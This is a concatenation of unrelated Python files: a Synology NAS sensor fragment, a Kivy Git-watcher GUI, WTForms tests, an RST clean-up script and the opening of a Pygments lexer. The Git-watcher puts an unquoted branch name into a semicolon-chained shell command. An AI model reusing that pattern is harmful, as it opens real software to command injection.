volumes = config['volumes']
if volumes is None:
volumes = api.storage().volumes
for volume in volumes:
sensors += [SynoNasStorageSensor(api, variable,
_STORAGE_VOL_MON_COND[variable],
volume)
for variable in config[CONF_MONITORED_CONDITIONS]
if variable in _STORAGE_VOL_MON_COND]
# Handle all Disks
disks = config['disks']
if disks is None:
disks = api.storage().disks
for disk in disks:
sensors += [SynoNasStorageSensor(api, variable,
_STORAGE_DSK_MON_COND[variable],
disk)
for variable in config[CONF_MONITORED_CONDITIONS]
if variable in _STORAGE_DSK_MON_COND]
add_devices_callback(sensors)
# Wait until start event is sent to load this component.
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, run_setup)
class SynoApi():
"""Class to interface with API."""
# pylint: disable=too-many-arguments, bare-except
def __init__(self, host, port, username, password, temp_unit):
"""Constructor of the API wrapper class."""
from SynologyDSM import SynologyDSM
self.temp_unit = temp_unit
try:
self._api = SynologyDSM(host,
port,
username,
password)
except:
_LOGGER.error("Error setting up Synology DSM")
def utilisation(self):
"""Return utilisation information from API."""
if self._api is not None:
return self._api.utilisation
def storage(self):
"""Return storage information from API."""
if self._api is not None:
return self._api.storage
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Update function for updating api information."""
self._api.update()
class SynoNasSensor(Entity):
"""Representation of a Synology Nas Sensor."""
def __init__(self, api, variable, variableInfo, monitor_device=None):
"""Initialize the sensor."""
self.var_id = variable
self.var_name = variableInfo[0]
self.var_units = variableInfo[1]
self.var_icon = variableInfo[2]
self.monitor_device = monitor_device
self._api = api
@property
def name(self):
"""Return the name of the sensor, if any."""
if self.monitor_device is not None:
return "{} ({})".format(self.var_name, self.monitor_device)
else:
return self.var_name
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return self.var_icon
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
if self.var_id in ['volume_disk_temp_avg', 'volume_disk_temp_max',
'disk_temp']:
return self._api.temp_unit
else:
return self.var_units
def update(self):
"""Get the latest data for the states."""
if self._api is not None:
self._api.update()
class SynoNasUtilSensor(SynoNasSensor):
"""Representation a Synology Utilisation Sensor."""
@property
def state(self):
"""Return the state of the sensor."""
network_sensors = ['network_up', 'network_down']
memory_sensors = ['memory_size', 'memory_cached',
'memory_available_swap', 'memory_available_real',
'memory_total_swap', 'memory_total_real']
if self.var_id in network_sensors or self.var_id in memory_sensors:
attr = getattr(self._api.utilisation(), self.var_id)(False)
if self.var_id in network_sensors:
return round(attr / 1024.0, 1)
elif self.var_id in memory_sensors:
return round(attr / 1024.0 / 1024.0, 1)
else:
return getattr(self._api.utilisation(), self.var_id)
class SynoNasStorageSensor(SynoNasSensor):
"""Representation a Synology Utilisation Sensor."""
@property
def state(self):
"""Return the state of the sensor."""
temp_sensors = ['volume_disk_temp_avg', 'volume_disk_temp_max',
'disk_temp']
if self.monitor_device is not None:
if self.var_id in temp_sensors:
attr = getattr(self._api.storage(),
self.var_id)(self.monitor_device)
if self._api.temp_unit == TEMP_CELSIUS:
return attr
else:
return round(attr * 1.8 + 32.0, 1)
else:
return getattr(self._api.storage(),
self.var_id)(self.monitor_device)
|
|
import os
import json
import settings
import sys
from watchdog.observers import Observer
from watchdog.observers.api import ObservedWatch
from kivy.app import App
from kivy.core.window import Window
from kivy.lang import Builder, Parser, ParserException
from kivy.properties import ListProperty, StringProperty, \
ObjectProperty
from kivy.factory import Factory
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.screenmanager import SlideTransition
from kivy.clock import Clock
from kivy.uix.progressbar import ProgressBar
from kivy.uix.spinner import Spinner
from kivy.uix.scatter import Scatter
from kivy.uix.widget import WidgetException
from kivy.uix.screenmanager import ScreenManagerException
from shortcuts import run_syscall, striptags, findparent
from checker import ChangeHandler
from buttons import *
from boxlayouts import *
Clock.max_iteration = 20
KVS = os.path.join(settings.PROJECT_PATH, "assets%sthemes" %
settings.PATH_SEPERATOR)
CLASSES = [c[:-3] for c in os.listdir(KVS) if c.endswith('.kv')]
ICON_PATH = os.path.join(settings.PROJECT_PATH, 'assets/GitWatcher.ico')
class MyScatter(Scatter):
name = StringProperty("")
sha = StringProperty("")
text = StringProperty("")
date = StringProperty("")
class CustomLabel(Label):
def __del__(self, *args, **kwargs):
pass
class ConfirmPopup(GridLayout):
"""
ConfirmPopup is for to handle user input yes-no
"""
text = StringProperty()
def __del__(self, *args, **kwargs):
pass
def __init__(self, **kwargs):
self.register_event_type('on_answer')
super(ConfirmPopup, self).__init__(**kwargs)
def on_answer(self, *args):
pass
class RemotePopup(GridLayout):
"""
RemotePopup is for listing all remote names and address for users
"""
remotes = ListProperty([])
branch = StringProperty("")
def __init__(self, **kwargs):
self.register_event_type('on_push')
super(RemotePopup, self).__init__(**kwargs)
def args_converter(self, row_index, item):
return {
'remote_path': item['path'],
'remote_name': item['name']
}
def on_push(self, *args):
pass
class CustomSpinner(Spinner):
"""
Base Spinner class has _on_dropdown_select method which holds
only change the text attribute of class which is not enough.
CustomSpinner used to display local branch list so any changes
of this is actually means changing current branch.
"""
def __del__(self, *args, **kwargs):
pass
def _on_dropdown_select(self, instance, data, *largs):
self.text = "[b]%s[/b]" % data
self.is_open = False
root = findparent(self, RepoWatcher)
root.change_branch(data, self.path)
class Menu(BoxLayout):
"""
.kv files are actually classes so each of them should be converted.
Each .kv files are actually corresponded to a menu button base class
name chosen as 'Menu'
"""
def __del__(self, *args, **kwargs):
pass
def __init__(self, **kwargs):
super(Menu, self).__init__(**kwargs)
parser = Parser(content=open(self.kv_file).read())
widget = Factory.get(parser.root.name)()
Builder._apply_rule(widget, parser.root, parser.root)
self.add_widget(widget)
@property
def kv_file(self):
return os.path.join(KVS, self.__class__.__name__ + '.kv')
for class_name in CLASSES:
globals()[class_name] = type(class_name, (Menu,), {})
class RepoWatcher(BoxLayout):
"""
RepoWatcher is the based/main class all others generated under this class
::repos: repository list which contains all repositories required fields;
names, paths
::active_menu_button: based on the active menu button which are history,
change, settings and branch screen will change
::screen_manager: To handle screen management an attribute will be more
efficient. By this way there will be no miss
::pb: progression can be dislayed
methods: show_kv, load_repo, get_activebranch, get_branches, change_branch
"""
repos = ListProperty()
screen_manager = ObjectProperty()
# Change control handler necessity
observer = ObjectProperty(None)
pb = ProgressBar()
def __del__(self, *args, **kwargs):
pass
def __init__(self, *args, **kwargs):
# Related kv will be return
super(BoxLayout, self).__init__(*args, **kwargs)
if 'initialize' in kwargs:
screen_button = {
'Changes': self.changes_button,
'History': self.history_button,
'Branches': self.branches_button,
'Settings': self.settings_button
}
# previously selected repo should be found.
try:
reponame = settings.DB.store_get('current_repo').strip()
repos = settings.DB.store_get('repos')
repo = filter(
lambda x: x['name'].strip() == reponame, repos)[0]
repo_path = repo['path']
except:
repo_path = ""
# Previously selected button and related screen is taken
screen = settings.DB.store_get('screen')
if screen == "FileDiff":
screen = "History"
screen_button[screen].make_pressed()
# Based on the screen base model will be taken
related_box = getattr(
self.screen_manager, screen.lower()).children[0].children[0]
# Then related box'es processes will be called.
# To know that the screen was loaded before all
# related processes is called.
function_name = ""
for func in ['changes_check', 'branches_check',
'check_history', 'settings_check']:
if hasattr(related_box, func):
function_name = func
break
if function_name == 'changes_check':
tasks = [self.show_kv(screen),
self.activate_sync(repo_path),
self.get_branches(repo_path),
related_box.get_userinfo(repo_path),
related_box.get_difffiles(repo_path),
related_box.get_unpushedcommits(repo_path),
related_box.get_current_branch(repo_path)]
elif function_name == 'branches_check':
tasks = [self.show_kv(screen),
self.activate_sync(repo_path),
self.get_branches(repo_path),
related_box.set_repopath(repo_path),
related_box.handle_merge_view(repo_path),
related_box.remove_newbranch_widget(repo_path),
related_box.remove_rename_widget(repo_path),
related_box.get_branches(repo_path),
related_box.clear_buttonactions(repo_path)]
elif function_name == 'check_history':
tasks = [self.show_kv(screen),
self.activate_sync(repo_path),
self.get_branches(repo_path),
related_box.get_history(repo_path),
related_box.get_diff_clear(repo_path)]
elif function_name == 'settings_check':
tasks = [self.show_kv(screen),
self.activate_sync(repo_path),
self.get_branches(repo_path),
related_box.set_repopath(repo_path),
related_box.get_remote(repo_path),
related_box.get_gitignore(repo_path)]
# Processes will be called and displayed completed ones on
# animation.
ProgressAnimator(self.pb, tasks)
os.chdir(settings.PROJECT_PATH)
self.observer_restart(repo_path, self)
def show_kv(self, value):
"""
show_kv function is for handle the screen_manager changes
default was called on init as 'Changes' the names of value
are represented on main .kv file. Corresponded screen
in other way to say .kv file displayed.
::value: String formatted as 'Changes', 'History', 'Branches',
'Settings', 'FileDiff'
In runtime, selected menu button checked for class name, by this way
screen datas update or keep.
"""
from boxlayouts import ChangesBox, BranchesBox, SettingsBox, HistoryBox
settings.DB.store_put('screen', value)
settings.DB.store_sync()
def _wrapper(callback=None):
try:
# Transition handled
if value == "FileDiff":
self.screen_manager.transition = SlideTransition(
direction='right')
else:
self.screen_manager.transition = SlideTransition(
direction='left')
# screen changes
prev = self.screen_manager.current
self.screen_manager.current = value
child = self.screen_manager.current_screen.children[0]
# Menu selection control and related repository tried to find
selected_menu_class = child.children[0].__class__
repolist = self.repolstview.children[0].children[0].children
pressed_repo = filter(lambda x: x.repobut.pressed, repolist)
repo_path = pressed_repo[0].repo_path if pressed_repo else ""
# Related screen and repository data merged and screen datas
# update.
if repo_path:
if selected_menu_class == ChangesBox().__class__:
child.children[0].changes_check(repo_path)
elif selected_menu_class == HistoryBox().__class__:
keep_old = False
if prev == 'FileDiff':
keep_old = True
child.children[0].check_history(repo_path,
keep_old=keep_old)
elif selected_menu_class == BranchesBox().__class__:
child.children[0].branches_check(repo_path)
elif selected_menu_class == SettingsBox().__class__:
child.children[0].settings_check(repo_path)
else:
if selected_menu_class == BranchesBox().__class__:
child.children[0].remove_newbranch_widget("")
child.children[0].remove_rename_widget("")
child.children[0].handle_merge_view("")
except (WidgetException, ScreenManagerException):
pass
if callback:
callback()
return _wrapper
def activate_sync(self, path):
def _wrapper(callback=None):
if path:
self.syncbutton.text = self.syncbutton.text.\
replace(settings.HEX_COLOR1, '000000')
self.syncbutton.path = path
if callback:
callback()
return _wrapper
def reset_screen(self):
"""
reset_screen, if repo somehow removed from
list then screens should be cleared.
"""
child = self.screen_manager.current_screen.children[0]
selected_menu_class = child.children[0].__class__
if selected_menu_class == ChangesBox().__class__:
child.children[0].changes_check("")
elif selected_menu_class == HistoryBox().__class__:
child.children[0].check_history("", keep_old=False)
elif selected_menu_class == BranchesBox().__class__:
child.children[0].branches_check("")
elif selected_menu_class == SettingsBox().__class__:
child.children[0].settings_check("")
def theme_args_converter(self, row_index, item):
"""
theme_args_converter; is for converting only color schemas
"""
return {
'name': item
}
def args_converter(self, row_index, item):
"""
args_converter, for displaying repositories
To display a list of data this convertion style is
requested for kivy Factory method.
"""
return {
'repo_path': item['path'],
'repo_name': item['name'],
'init_pressed': item['init_pressed']}
def load_repo(self, reset=True):
"""
load_repo, for loading repository list from .json file (if exists).
file path is found on settings. In any exception repos sets to empty list
"""
try:
self.repos = settings.DB.store_get('repos')
settings.DB.store_sync()
try:
reponame = settings.DB.store_get('current_repo').strip()
repo = filter(
lambda x: x['name'].strip() == reponame, self.repos)
repo = repo and repo[0] or ""
for rep in self.repos:
rep['init_pressed'] = True if rep == repo else False
except Exception, e:
print "BARBAROS", e
pass
except (TypeError, ValueError, KeyError):
directory = os.path.dirname(settings.REPOFILE)
if not os.path.exists(directory):
os.makedirs(directory)
settings.DB.store_put('repos', [])
settings.DB.store_put('current_repo', "")
settings.DB.store_sync()
self.repos = []
if reset:
self.reset_screen()
def remove_repo(self, path):
try:
repos = settings.DB.store_get('repos')
self.repos = filter(lambda x: x['path'] != path, repos)
settings.DB.store_put('repos', self.repos)
settings.DB.store_sync()
except (TypeError, ValueError):
self.repos = []
finally:
self.reset_screen()
def get_activebranch(self, path):
"""
get_activebranch, to find the current branch of selected git repository.
::path: Repository path
"""
os.chdir(path)
out = run_syscall('git branch')
text = filter(
lambda x: x.find("* ") != -1, out.split("\n"))[0].replace("* ", "")
os.chdir(settings.PROJECT_PATH)
return text
def get_branches(self, path):
"""
get_branches, collects local branches of repository
::path: Repository path.
::callback: at the end method calls
callback method is for to show the progression of bulk of method if any.
"""
def _wrapper(callback=None):
if path:
os.chdir(path)
out = run_syscall('git branch')
values = map(
lambda x: x.replace("* ", "").strip(), out.split("\n"))
text = self.get_activebranch(path)
self.branchlist.text = "[color=%s][b]%s[/b][/color]" % (
settings.HEX_COLOR1, text)
self.branchlist.values = values
self.branchlist.path = path
self.branchlist.font_name = settings.KIVY_DEFAULT_FONT
os.chdir(settings.PROJECT_PATH)
else:
self.branchlist.text = ""
self.branchlist.values = []
self.branchlist.path = ""
self.branchlist.font_name = settings.KIVY_DEFAULT_FONT
if callback:
callback()
return _wrapper
def change_branch(self, branch_name, path):
"""
change_branch, handle changing current branches.
::branch_name: branch name which wanted to checkout
::path: related repository path
branch name is marked up to use that markup should be cleared
"""
try:
branch_name = striptags(branch_name)
os.chdir(path)
out = run_syscall(
'git stash clear;git stash;git checkout %s;git stash pop' % branch_name)
screen = self.screen_manager.children[0].children[0].children[0]
if self.screen_manager.current == "History":
screen.check_history(path)
elif self.screen_manager.current == "Changes":
screen.changes_check(path)
elif self.screen_manager.current == "Branches":
screen.branches_check(path)
elif self.screen_manager.current == 'Settings':
screen.settings_check(path)
except OSError:
pass
finally:
os.chdir(settings.PROJECT_PATH)
def refresh_required(self, path):
repoitems = self.repolstview.children[0].children[0].children
if path:
for item in repoitems:
if item.repobut.repo_path == path:
item.refreshbut.textcolor = settings.HEX_COLOR1
else:
for item in repoitems:
if item.repobut.repo_path == path:
item.refreshbut.textcolor = settings.HEX_COLOR2
def observer_start(self, repo_path, root):
if repo_path:
event_handler = ChangeHandler(path=repo_path, root=root)
self.observer = Observer()
self.observer.schedule(
event_handler, path=repo_path, recursive=True)
self.observer.start()
def observer_stop(self):
if self.observer:
self.observer.stop()
self.observer.join()
def observer_restart(self, repo_path, root):
self.observer_stop()
self.observer_start(repo_path, root)
class RepoWatcherApp(App):
def __init__(self, *args, **kwargs):
super(RepoWatcherApp, self).__init__(*args, **kwargs)
Builder.load_file('%(pp)s%(ps)sassets%(ps)sthemes%(ps)sCompact.kv' %
{'pp': settings.PROJECT_PATH,
'ps': settings.PATH_SEPERATOR})
self.layout = RepoWatcher(initialize=True)
self.icon = ICON_PATH
self.title = "Git Watcher UI"
def __del__(self, *args, **kwargs):
pass
def build(self):
"""
Main application object creation, required calls handled
such title, icon and repository list are sets and
data collections taken
::title: set the title of project
::icon: to displayed icon is set
Builder should be take style, on Mac the same name of
main application on the same folder will be enough
but on linux based OS this should be hold by developer
::Builder.load_file(...)
main application 'RepoWatcher' should be hold all
previously set repository datas, to do that 'load_repo' function called
"""
self.layout.load_repo()
return self.layout
def restart(self):
args = sys.argv[:]
args.insert(0, sys.executable)
os.execv(sys.executable, args)
def on_stop(self):
self.layout.observer_stop()
if __name__ == '__main__':
RepoWatcherApp().run()
|
|
import pytest
from tests.common import DummyPostData
from wtforms.fields import IntegerField
from wtforms.fields import StringField
from wtforms.form import BaseForm
from wtforms.form import Form
from wtforms.meta import DefaultMeta
from wtforms.validators import DataRequired
from wtforms.validators import ValidationError
class TestBaseForm:
def get_form(self, **kwargs):
def validate_test(form, field):
if field.data != "foobar":
raise ValidationError("error")
return BaseForm({"test": StringField(validators=[validate_test])}, **kwargs)
def test_data_proxy(self):
form = self.get_form()
form.process(test="foo")
assert form.data == {"test": "foo"}
def test_errors_proxy(self):
form = self.get_form()
form.process(test="foobar")
form.validate()
assert form.errors == {}
form = self.get_form()
form.process()
form.validate()
assert form.errors == {"test": ["error"]}
def test_contains(self):
form = self.get_form()
assert "test" in form
assert "abcd" not in form
def test_field_removal(self):
form = self.get_form()
del form["test"]
with pytest.raises(AttributeError):
form.test
assert "test" not in form
def test_field_adding(self):
form = self.get_form()
assert len(list(form)) == 1
form["foo"] = StringField()
assert len(list(form)) == 2
form.process(DummyPostData(foo=["hello"]))
assert form["foo"].data == "hello"
form["test"] = IntegerField()
assert isinstance(form["test"], IntegerField)
assert len(list(form)) == 2
with pytest.raises(AttributeError):
form["test"].data
form.process(DummyPostData(test=["1"]))
assert form["test"].data == 1
assert form["foo"].data is None
def test_populate_obj(self):
m = type("Model", (object,), {})
form = self.get_form()
form.process(test="foobar")
form.populate_obj(m)
assert m.test == "foobar"
assert [k for k in dir(m) if not k.startswith("_")] == ["test"]
def test_prefixes(self):
form = self.get_form(prefix="foo")
assert form["test"].name == "foo-test"
assert form["test"].short_name == "test"
assert form["test"].id == "foo-test"
form = self.get_form(prefix="foo.")
form.process(DummyPostData({"foo.test": ["hello"], "test": ["bye"]}))
assert form["test"].data == "hello"
assert self.get_form(prefix="foo[")["test"].name == "foo[-test"
def test_formdata_wrapper_error(self):
form = self.get_form()
with pytest.raises(TypeError):
form.process([])
class TestFormMeta:
def test_monkeypatch(self):
class F(Form):
a = StringField()
assert F._unbound_fields is None
F()
assert F._unbound_fields == [("a", F.a)]
F.b = StringField()
assert F._unbound_fields is None
F()
assert F._unbound_fields == [("a", F.a), ("b", F.b)]
del F.a
with pytest.raises(AttributeError):
F.a
F()
assert F._unbound_fields == [("b", F.b)]
F._m = StringField()
assert F._unbound_fields == [("b", F.b)]
def test_subclassing(self):
class A(Form):
a = StringField()
c = StringField()
class B(A):
b = StringField()
c = StringField()
A()
B()
assert A.a is B.a
assert A.c is not B.c
assert A._unbound_fields == [("a", A.a), ("c", A.c)]
assert B._unbound_fields == [("a", B.a), ("b", B.b), ("c", B.c)]
def test_class_meta_reassign(self):
class MetaA:
pass
class MetaB:
pass
class F(Form):
Meta = MetaA
assert F._wtforms_meta is None
assert isinstance(F().meta, MetaA)
assert issubclass(F._wtforms_meta, MetaA)
F.Meta = MetaB
assert F._wtforms_meta is None
assert isinstance(F().meta, MetaB)
assert issubclass(F._wtforms_meta, MetaB)
class TestForm:
class F(Form):
test = StringField()
def validate_test(self, field):
if field.data != "foobar":
raise ValidationError("error")
def test_validate(self):
form = self.F(test="foobar")
assert form.validate() is True
form = self.F()
assert form.validate() is False
def test_validate_with_extra(self):
class F2(self.F):
other = StringField()
def extra(form, field):
if field.data != "extra":
raise ValidationError("error")
form = F2(test="foobar", other="extra")
assert form.validate(extra_validators={"other": [extra]})
form = F2(test="foobar", other="nope")
assert not form.validate(extra_validators={"other": [extra]})
form = F2(test="nope", other="extra")
assert not form.validate(extra_validators={"other": [extra]})
def test_form_level_errors(self):
class F(Form):
a = IntegerField()
b = IntegerField()
def validate(self):
if not super().validate():
return False
if (self.a.data + self.b.data) % 2 != 0:
self.form_errors.append("a + b should be even")
return False
return True
f = F(a=1, b=1)
assert f.validate()
assert not f.form_errors
assert not f.errors
f = F(a=0, b=1)
assert not f.validate()
assert ["a + b should be even"] == f.form_errors
assert ["a + b should be even"] == f.errors[None]
def test_field_adding_disabled(self):
form = self.F()
with pytest.raises(TypeError):
form.__setitem__("foo", StringField())
def test_field_removal(self):
form = self.F()
del form.test
assert "test" not in form
assert form.test is None
assert len(list(form)) == 0
# Try deleting a nonexistent field
with pytest.raises(AttributeError):
form.__delattr__("fake")
def test_delattr_idempotency(self):
form = self.F()
del form.test
assert form.test is None
# Make sure deleting a normal attribute works
form.foo = 9
del form.foo
with pytest.raises(AttributeError):
form.__delattr__("foo")
# Check idempotency
del form.test
assert form.test is None
def test_ordered_fields(self):
class MyForm(Form):
strawberry = StringField()
banana = StringField()
kiwi = StringField()
assert [x.name for x in MyForm()] == ["strawberry", "banana", "kiwi"]
MyForm.apple = StringField()
assert [x.name for x in MyForm()], ["strawberry", "banana", "kiwi", "apple"]
del MyForm.banana
assert [x.name for x in MyForm()] == ["strawberry", "kiwi", "apple"]
MyForm.strawberry = StringField()
assert [x.name for x in MyForm()] == ["kiwi", "apple", "strawberry"]
# Ensure sort is stable: two fields with the same creation counter
# should be subsequently sorted by name.
MyForm.cherry = MyForm.kiwi
assert [x.name for x in MyForm()] == ["cherry", "kiwi", "apple", "strawberry"]
def test_data_arg(self):
data = {"test": "foo"}
form = self.F(data=data)
assert form.test.data == "foo"
form = self.F(data=data, test="bar")
assert form.test.data == "bar"
def test_empty_formdata(self):
"""If formdata is empty, field.process_formdata should still
run to handle empty data.
"""
class EmptyStringField(StringField):
def process_formdata(self, valuelist):
self.data = valuelist[0] if valuelist else "processed"
class F(Form):
test = EmptyStringField()
assert F().test.data is None
assert F(test="test").test.data == "test"
assert F(DummyPostData({"other": "other"})).test.data == "processed"
assert F(DummyPostData()).test.data == "processed"
assert F(DummyPostData(), test="test").test.data == "processed"
assert F(DummyPostData({"test": "foo"}), test="test").test.data == "foo"
def test_errors_access_during_validation(self):
class F(Form):
foo = StringField(validators=[DataRequired()])
def validate(self):
super().validate()
self.errors
self.foo.errors.append("bar")
return True
form = F(foo="whatever")
form.validate()
assert {"foo": ["bar"]} == form.errors
class TestMeta:
class F(Form):
class Meta:
foo = 9
test = StringField()
class G(Form):
class Meta:
foo = 12
bar = 8
class Basic(F, G):
class Meta:
quux = 42
class MissingDiamond(F, G):
pass
def test_basic(self):
form = self.Basic()
meta = form.meta
assert meta.foo == 9
assert meta.bar == 8
assert meta.csrf is False
assert isinstance(meta, self.F.Meta)
assert isinstance(meta, self.G.Meta)
assert type(meta).__bases__ == (
self.Basic.Meta,
self.F.Meta,
self.G.Meta,
DefaultMeta,
)
def test_missing_diamond(self):
meta = self.MissingDiamond().meta
assert type(meta).__bases__ == (self.F.Meta, self.G.Meta, DefaultMeta)
|
|
# This script should really be documented
import codecs
from os import listdir, path
import pypandoc
import sys
from re import sub
import re
# In[ ]:
def get_rst_file_names():
def ends_with_rst(line):
if line.endswith('.rst'):
return True
else:
return False
return filter(ends_with_rst, listdir(path.curdir))
# In[ ]:
def get_lines(file_name):
with codecs.open(file_name, 'r', 'utf-8') as f:
lines = f.readlines()
return lines
# In[ ]:
def save_lines(lines, file_name):
with codecs.open(file_name, "w", "utf-8") as f:
f.writelines(lines)
# In[ ]:
def fix_note_indentation(lines):
for i, line in enumerate(lines):
if line.startswith('.. note::'):
counter = i
while True:
counter += 1
try:
if lines[counter] == '\n':
break
else:
lines[counter] = ' ' + lines[counter]
except:
break
# In[ ]:
def remove_endswith(lines, exclude_string='#ex\n'):
new_lines = []
for line in lines:
if not line.endswith(exclude_string):
new_lines.append(line)
return new_lines
# In[ ]:
def remove_startsswith(lines, exclude_string):
new_lines = []
for line in lines:
if not line.startswith(exclude_string):
new_lines.append(line)
return new_lines
# In[ ]:
def remove_empty_block(lines, block_string):
new_lines = []
for i, line in enumerate(lines):
if line.startswith(block_string) and lines[i + 2] == ' \n':
pass
elif line.startswith(block_string) and lines[i + 2] == '\n':
pass
else:
new_lines.append(line)
return new_lines
# In[ ]:
def replace_in_string(line, to_replace, replacement):
new_string = line
while True:
try:
new_string = line[:line.index(
to_replace)] + replacement + line[line.index(to_replace) + len(to_replace):]
line = new_string
except:
break
return new_string
# In[ ]:
def replace_in_all(lines, to_replace, replacement):
new_lines = []
for line in lines:
new_lines.append(replace_in_string(line, to_replace, replacement))
return new_lines
# In[ ]:
def remove_specified_images(lines):
new_lines = []
remove_next = False
for line in lines:
if line.endswith('#remove_next\n'):
remove_next = True
elif remove_next and line.startswith('.. image'):
remove_next = False
else:
new_lines.append(line)
return new_lines
# In[103]:
def clear_extra_slashes(line):
return line.replace('\\\\', '@@@@').replace('\\', '').replace('@@@@', '\\')
# In[ ]:
def table_math(new_line):
slash_matches = re.findall(r':math:\\`(.*?)`', new_line)
for s_m in slash_matches:
s, d = count_slashes(s_m)
s_m_clean = clear_extra_slashes(s_m)
new_line = new_line.replace(':math:\\`%s`' % s_m,
':math:`%s` %s%s' % (s_m_clean, s * ' ', d * ' '))
return new_line
# In[ ]:
def convert_html_tables(lines):
new_lines = []
replace_next = False
for line in lines:
if line.startswith('.. raw:: html'):
replace_next = True
elif replace_next and line != '\n':
table = line.strip()
new_line = pypandoc.convert(table, to='rst', format='html')
new_line = table_math(new_line)
new_lines.append(new_line)
replace_next = False
else:
new_lines.append(line)
new_lines = [line + '\n' for line in ''.join(new_lines).splitlines()]
return new_lines
# In[100]:
def count_slashes(a_string):
doubles = a_string.count('\\\\')
singles = a_string.count('\\') - 2 * doubles
return singles, doubles
# In[1]:
def add_in_out(lines):
counter = 0
new_lines = []
for line in lines:
if line.startswith('.. code::'):
counter += 1
line = '``In [%s]:``\n\n%s' % (counter, line)
if line.startswith('.. parsed-literal::'):
line = '``Out[%s]:``\n\n%s' % (counter, line)
new_lines.append(line)
return new_lines
# In[96]:
def sub_math(lines):
new_lines = []
for line in lines:
matches = re.findall(r'\$(.*?)\$', line)
for match in matches:
line = line.replace('$%s$' % match,
':math:`%s`' % (match))
new_lines.append(line)
return new_lines
def find_tables(lines):
"""
For a list of lines, splits lines into blocks (stored in lists
of lines within two lists) representing tables or non tables. Also
return if a file starts with a table or a non-table (mostly
non-tables, but functionality is included for robustness).
"""
in_table = False
tables = []
non_tables = []
current_table = []
current_non_table = []
text_first = None
for i, line in enumerate(lines):
if line.startswith('+') and line.strip().endswith('+') and not in_table:
in_table = True
if len(current_non_table) != 0:
non_tables.append(current_non_table)
current_non_table = []
current_table.append(line)
if text_first is None:
text_first = False
elif in_table and (line.startswith('+') or line.startswith('|')):
current_table.append(line)
elif in_table:
in_table = False
tables.append(current_table)
current_table = []
current_non_table.append(line)
else:
if text_first is None:
text_first = True
current_non_table.append(line)
if len(current_non_table) != 0:
non_tables.append(current_non_table)
if len(current_table) != 0:
tables.append(current_table)
return tables, non_tables, text_first
def weave_lists(tables, non_tables, text_first):
"""
Takes a list of tables, non-tables and a boolean indicating which
should come first and returns a single list of lines.
"""
new_list = []
total_blocks = len(tables) + len(non_tables)
for i in range(total_blocks):
if text_first:
new_list.extend(non_tables.pop(0))
text_first = False
else:
new_list.extend(tables.pop(0))
text_first = True
return new_list
def fix_all_table_split(lines):
"""
Uses find_tables, fix_table_splits and weave_lists to construct
a new list of all lines with tables with the correct formatting.
"""
tables, non_tables, text_first = find_tables(lines)
new_tables = []
for table in tables:
new_tables.append(fix_table_splits(table))
return weave_lists(new_tables, non_tables, text_first)
def fix_table_splits(table_lines):
"""
Adds an escape "\" to lines where text has been split incorrectly
(prematurely).
"""
new_table = []
for line in table_lines:
if line.startswith('+'):
new_line = ''
line_type = line[1]
for i, char in enumerate(line):
if char == '+' and line[i + 1] == line_type:
char = '+' + line_type
new_line = new_line + char
new_table.append(new_line)
else:
new_line = ''
for i, char in enumerate(line):
if char == ' ' and line[i + 1] == '|':
if line[i - 1] != ' ':
char = '\ '
else:
char = ' '
new_line = new_line + char
new_table.append(new_line)
return new_table
if __name__ == "__main__":
to_remove_block_strings = ['.. code::', '.. parsed-literal::']
ends_with_to_remove = ['#ex\n']
starts_with_to_remove = [' %matplotlib inline']
replacements = [('*#', '`'),
('#*', '`_'),
('.ipynb#', '.html#'),
('code:: ipython2', 'code:: python')]
if len(sys.argv) == 1:
file_names = get_rst_file_names()
else:
file_names = sys.argv[1:]
for file_name in file_names:
print "Applying fixes for: ", file_name
lines = get_lines(file_name)
fix_note_indentation(lines)
for to_remove in ends_with_to_remove:
lines = remove_endswith(lines, to_remove)
for to_remove in starts_with_to_remove:
lines = remove_startsswith(lines, to_remove)
for to_replace, replacement in replacements:
lines = replace_in_all(lines, to_replace, replacement)
lines = remove_specified_images(lines)
lines = sub_math(lines)
lines = fix_all_table_split(lines)
lines = convert_html_tables(lines)
for block_to_remove in to_remove_block_strings:
lines = remove_empty_block(lines, block_to_remove)
lines = add_in_out(lines)
save_lines(lines, file_name)
|
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.dsls
~~~~~~~~~~~~~~~~~~~~
Lexers for various domain-specific languages.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, bygroups, words, include, default, \
this, using, combined
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Literal, Whitespace
__all__ = ['ProtoBufLexer', 'BroLexer', 'PuppetLexer', 'RslLexer',
'MscgenLexer', 'VGLLexer', 'AlloyLexer', 'PanLexer',
'CrmshLexer', 'ThriftLexer']
class ProtoBufLexer(RegexLexer):
"""
Lexer for `Protocol Buffer <http://code.google.com/p/protobuf/>`_
definition files.
.. versionadded:: 1.4
"""
name = 'Protocol Buffer'
aliases = ['protobuf', 'proto']
filenames = ['*.proto']
tokens = {
'root': [
(r'[ \t]+', Text),
(r'[,;{}\[\]()]', Punctuation),
(r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single),
(r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline),
(words((
'import', 'option', 'optional', 'required', 'repeated', 'default',
'packed', 'ctype', 'extensions', 'to', 'max', 'rpc', 'returns',
'oneof'), prefix=r'\b', suffix=r'\b'),
Keyword),
(words((
'int32', 'int64', 'uint32', 'uint64', 'sint32', 'sint64',
'fixed32', 'fixed64', 'sfixed32', 'sfixed64',
'float', 'double', 'bool', 'string', 'bytes'), suffix=r'\b'),
Keyword.Type),
(r'(true|false)\b', Keyword.Constant),
(r'(package)(\s+)', bygroups(Keyword.Namespace, Text), 'package'),
(r'(message|extend)(\s+)',
bygroups(Keyword.Declaration, Text), 'message'),
(r'(enum|group|service)(\s+)',
bygroups(Keyword.Declaration, Text), 'type'),
(r'\".*?\"', String),
(r'\'.*?\'', String),
(r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float),
(r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float),
